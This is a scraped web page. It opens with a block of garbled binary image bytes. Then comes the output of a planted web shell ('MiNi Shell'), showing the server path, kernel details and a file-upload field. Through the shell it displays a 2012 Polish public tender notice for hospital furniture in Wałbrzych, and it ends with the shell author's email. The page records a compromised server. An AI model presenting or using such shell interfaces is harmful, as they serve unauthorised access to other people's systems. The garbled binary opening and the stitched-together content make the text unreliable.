JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120810/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120810/296564-N-2012.html

<p class="kh_header"><b>Wałbrzych: Dostawa i montaż mebli dla Oddziału Dziennego dla dzieci i młodzieży w budynku nr 14 w Specjalistycznym Szpitalu im. dra A.Sokołowskiego w Wałbrzychu</b><br>
<b>Numer ogłoszenia: 296564 - 2012; data zamieszczenia: 10.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Szpital im. dr Alfreda Sokołowskiego , ul. Sokołowskiego 4, 58-309 Wałbrzych, woj. dolnośląskie, tel. 074 6489742, faks 074 6489746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdrowie.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli dla Oddziału Dziennego dla dzieci i młodzieży w budynku nr 14 w Specjalistycznym Szpitalu im. dra A.Sokołowskiego w Wałbrzychu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli dla Oddziału Dziennego dla dzieci i młodzieży w budynku nr 14 w Specjalistycznym Szpitalu im. dra A.Sokołowskiego w Wałbrzychu.
Zestawienie zbiorcze
	MODUŁ MEBLI 			SZT.	cena	wartość	wartość 
 	 	 	 	 	 	netto	netto	brutto
 	 	 	 	 	 	 	 	 
 	 	 	 	 	 	 	 	 
 	 	 	 	 	 	 	 	 
GABINET DYREKTORA	 	 	 	 	 	 	 
1. Biurko komputerowe  łamane  1800 x 1200 x750  	1	 	 	 
 	 	 	 	 	 	 	 	 
2. Kontener szufladowy na kółkach z piórnikiem	 				2	 	 	 
 	 	 	 	 	 	 	 	 
3. Biurko komputerowe    1400 x 700 x750  	 	 	 	 	 	 	 	 
 	 	 	 	 	1	 	 	 
4. Szafa aktowa z drzwiami rozsuwanymi 2680x450x3000	 	 	 	 
 	 	 	 	 	1	 	 	 
5. Szafa aktowa z drzwiami rozsuwanymi 2680x450x3000	 	 	 	 
    szafa jako ścianka działowa 			1	 	 	 
6. panel z chowanymi drzwiami na rolkach z górnym prowadzeniem	 	 	 	 
   2680x80x3000   	 	 	 	1	 	 	 
7.stolik okrągły O 500 wys.600			 	 	 	 
 	 	 	 	 	1	 	 	 
8. fotel  					 	 	 	 
 	 	 	 	 	2	 	 	 
9. Dostawka do biurka 800x300x750			 	 	 	 
 	 	 	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
SEKRETARIAT	 	 	 	 	 	 	 
10. Szafa aktowa z nadstawką  750x400x2630		 	 	 	 
 	 	 	 	 	3	 	 	 
11.Szafa ubraniowa 700x600x1870			 	 	 	 
 	 	 	 	 	1	 	 	 
12.stolik 500x400x600				 	 	 	 
 	 	 	 	 	1	 	 	 
13. biurko komputerowe z nadstawką 1800x1200x800	 	 	 	 
 	 	 	 	 	1	 	 	 
14. dostawka do biurka 1700x300x750			 	 	 	 
 	 	 	 	 	1	 	 	 
15. Kontener szufladowy na kółkach z piórnikiem		 	 	 	 
 	 	 	 	 	1	 	 	 
16. Szafka wisząca narożna 400x400x720		 	 	 	 
 	 	 	 	 	1	 	 	 
17. Szafka stojąca narożna 400x400x720		 	 	 	 
 	 	 	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
POKÓJ SOCJALNY	 	 	 	 	 	 	 
 	 	 	 	 	 	 	 	 
18. Szafa socjalna z 12 drzwiami 1050x450x1800	 	1	 	 	 
 	 	 	 	 	 	 	 	 
19.Szafa socjalna z 6 drzwiami oraz miejscem na dzienniki  700x450x1800	1	 	 	 
 	 	 	 	 	 	 	 	 
20. Szafka szufladowa z blatem 450x600x750	 	1	 	 	 
 	 	 	 	 	 	 	 	 
21. Szafka z umywalką i baterią lekarską 600x600x750	1	 	 	 
 	 	 	 	 	 	 	 	 
22. Szafka ze zlewozmywakiem i baterią 500x600x750	1	 	 	 
 					 	 	 	 
23. lodówka podblatowa wolnostojąca	 	 	1	 	 	 
 					 	 	 	 
24. Szafka wisząca pod kuchenkę mikro 600x300x900	1	 	 	 
 					 	 	 	 
25. Szafka wisząca z ociekarką 600x300x720		1	 	 	 
 	 	 	 	 	 	 	 	 
26. Szafka wisząca 950x300x720			1	 	 	 
 	 	 	 	 	 	 	 	 
27.Stoły socjalne  2000x600x750	 	 	2	 	 	 
 	 	 	 	 	 	 	 	 
POKÓJ PSYCHOLOGÓW	 	 	 	 	 	 	 
 					 	 	 	 
28. biurko komputerowe zaokraglone 1600x700x750	1	 	 	 
 					 	 	 	 
29. biurko komputerowe 1200x700x750	 	 	1	 	 	 
 					 	 	 	 
30. Kontener szufladowy na kółkach z piórnikiem	 	2	 	 	 
 					 	 	 	 
31. dostawka do biurka 800x300x750	 	 	1	 	 	 
 					 	 	 	 
32. szafa aktowa 400x400x1870	 	 	1	 	 	 
 					 	 	 	 
33.szafa ubraniowa 600x400x1870	 	 	1	 	 	 
 					 	 	 	 
34.szafa aktowa z wnęką 800x400x1870	 	1	 	 	 
 	 	 	 	 	 	 	 	 
GABINET  ZABIEGOWY	 	 	 	 	 	 	 
35.biurko komputerowe dwustronne1400x800x750	 	1	 	 	 
 	 	 	 	 	 	 	 	 
36. Kontener szufladowy na kółkach z piórnikiem	 	 	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
37. dostawka do biurka 800x300x750	 	 	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
38. szafa gospodarcza 900x270x2010			 	 	 	 
 	 	 	 	 	1	 	 	 
 					 	 	 	 
39.Szafka wisząca z ociekarką 800x300x720	 	1	 	 	 
 	 	 	 	 	 	 	 	 
40. Szafka wisząca  500x300x720	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
41.Szafka wisząca 900x300x720	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
42. Szafka szufladowa z blatem 500x600x750	 	1	 	 	 
 	 	 	 	 	 	 	 	 
43. Szafka z umywalką i baterią lekarską 700x600x750	1	 	 	 
 	 	 	 	 	 	 	 	 
44. Szafka ze zlewozmywakiem i baterią 800x600x750	1	 	 	 
 					 	 	 	 
45. lodówka podblatowa wolnostojąca	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
POKÓJ TERAPEUTÓW	 	 	 	 	 	 	 
 					 	 	 	 
46. biurko komputerowe dwustronne  1300x700x800	1	 	 	 
 					 	 	 	 
47.  Kontener szufladowy na kółkach z piórnikiem	 	2	 	 	 
48. panel z chowanymi drzwiami na rolkach z górnym prowadzeniem					 	 	 	 
      2800x80x2200   	 	 	 	1	 	 	 
49.Szafa aktowa z wnęką 800x400x2100		 	 	 	 
     	 	 	 	 	1	 	 	 
 					 	 	 	 
50. Szafa aktowa  800x400x2100	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
GABINET LEKARSKI	 	 	 	 	 	 	 
51.biurko komputerowe 1600x750x750	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
52. Kontener szufladowy na kółkach z piórnikiem	 	 	 	 	2	 	 	 
 	 	 	 	 	 	 	 	 
53. dostawka do biurka 800x300x750	 	 	 	 	2	 	 	 
 	 	 	 	 	 	 	 	 
54. biurko komputerowe 1500x750x750			 	 	 	 
 	 	 	 	 	1	 	 	 
 					 	 	 	 
55.szafa ubraniowa 800x600x2100	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
56. szafa aktowa 800x600x2100	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
57.szafa aktowa z wneką 800x600x2100	 	1	 	 	 
 					 	 	 	 
58. regal otwarty końcowy 300x600x2100		1	 	 	 
 	 	 	 	 	 	 	 	 
59. Kontener pod kserokopiarkę	 	 	1	 	 	 
 					 	 	 	 
60. szafa aktowa 2100x600x400			1	 	 	 
 	 	 	 	 	 	 	 	 
61. szafa aktowa z wneką 2100x600x400	 	1	 	 	 
62. panel z chowanymi drzwiami na rolkach z górnym prowadzeniem	 	 	 	 
      2800x80x2200 	 	 	 	1	 	 	 
63. Szafka z umywalką i baterią lekarską 600x600x850					 	 	 	 
      	 	 	 	 	1	 	 	 
64.Szafka wisząca 800x300x720	 	 	 	 	 	 
 	 	 	 	 	1	 	 	 
65. Szafka stojąca z blatem 800x600x850	 	 	 	 	 
 	 	 	 	 	1	 	 	 
66. Szafa aktowa  2740x400x3000 jako ścianka działowa 	1	 	 	 
  					 	 	 	 
67. panel z chowanymi drzwiami na rolkach z górnym prowadzeniem	1	 	 	 
   2680x80x3000   	 	 	 	 	 	 	 
68. stolik okrągły O 500 wys.600	 	 	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
69. sofa dwuosobowa 				 	 	 	 
 	 	 	 	 	1	 	 	 
 					 	 	 	 
70.fotel 	 	 	 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
SALA ZJĘĆ 1.4	 	 	 	 	 	 	 
 	 	 	 	 	 	 	 	 
71. Biurko z kontenerkiem  1200 x 700 x 750 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
72. Szafa aktowa z nadstawką 850x400x2630	 	2	 	 	 
 					 	 	 	 
73. Regał końcowy 400x400x2630			1	 	 	 
 	 	 	 	 	 	 	 	 
74. stolik szkolny jednoosobowy regulowany	 	12	 	 	 
 					 	 	 	 
75. krzesło szkolne regulowane					12	 	 	 
 	 	 	 	 	 	 	 	 
SALA ZJĘĆ 1.3	 	 	 	 	 	 	 
 	 	 	 	 	 	 	 	 
76. Biurko z kontenerkiem  1200 x 700 x 750 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
77. Szafa aktowa z nadstawką 750x400x2630	 	4	 	 	 
 					 	 	 	 
78. Regał końcowy 400x400x2630			1	 	 	 
 	 	 	 	 	 	 	 	 
79. Szafa aktowa narożna z nadstawką 850x400x2630	1	 	 	 
 	 	 	 	 	 	 	 	 
80. stolik szkolny jednoosobowy regulowany	 	12	 	 	 
 	 	 	 	 	 	 	 	 
81. krzesło szkolne regulowane	 	 	12	 	 	 
 	 	 	 	 	 	 	 	 
SALA ZJĘĆ 1.2	 	 	 	 	 	 	 
 	 	 	 	 	 	 	 	 
82. Biurko z kontenerkiem  1200 x 700 x 750 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
83. Szafa aktowa z nadstawką 700x400x2630	 	2	 	 	 
 					 	 	 	 
84. Regał końcowy 300x400x2630			1	 	 	 
 	 	 	 	 	 	 	 	 
85. stolik szkolny jednoosobowy regulowany	 	12	 	 	 
 					 	 	 	 
86. krzesło szkolne regulowane					12	 	 	 
 	 	 	 	 	 	 	 	 
SALA ZJĘĆ 1.1	 	 	 	 	 	 	 
 	 	 	 	 	 	 	 	 
87. Biurko z kontenerkiem  1200 x 700 x 750 	 	1	 	 	 
 	 	 	 	 	 	 	 	 
88. Szafa aktowa z nadstawką 750x400x2630	 	2	 	 	 
 					 	 	 	 
89. Regał końcowy350x400x2630			1	 	 	 
 	 	 	 	 	 	 	 	 
90. Szafa aktowa z nadstawką 700x400x2630	 	2	 	 	 
 	 	 	 	 	 	 	 	 
91. stolik szkolny jednoosobowy regulowany	 	12	 	 	 
 	 	 	 	 	 	 	 	 
92. krzesło szkolne regulowane	 	 	12	 	 	 
 	 	 	 	 	 	 	 	 
KORYTARZ	 	 	 	 	 	 	 	 
 	 	 	 	 	 	 	 	 
93. szafka socjalna typ L podwójna 370x400x1800	 	16	 	 	 
 	 	 	 	 	 	 	 	 
94. szafka socjalna podwójna 400x400x1300	 	2	 	 	 
 	 	 	 	Razem	 	 	0	0
							netto	brutto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dostawa i montaż mebli dla Oddziału Dziennego dla dzieci i młodzieży w budynku nr 14 w Specjalistycznym Szpitalu im. dra A.Sokołowskiego w Wałbrzychu</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2, 39.13.10.00-9, 39.12.11.00-7, 39.14.13.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium wymagana do wzięcia udziału w postępowaniu -  2 280,00zł. 
(słownie: dwa tysiące dwieście osiemdziesiąt złotych, 00/100).

DATĄ UZNANIA WPŁATY  BĘDZIE DATA WPŁYWU NA KONTO ZAMAWIAJĄCEGO.

Potwierdzenie wniesienia wadium należy dołączyć do oferty. Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania.

Konto bankowe: Kredyt Bank S.A. o/Wałbrzych 36 1500 1764 1217 6005 2413 0000.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie doświadczenie w zakresie świadczenia dostaw będących przedmiotem zamówienia - na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że dostawy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdrowie.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego-Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 10:00, miejsce: Siedziba Zamawiającego-Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com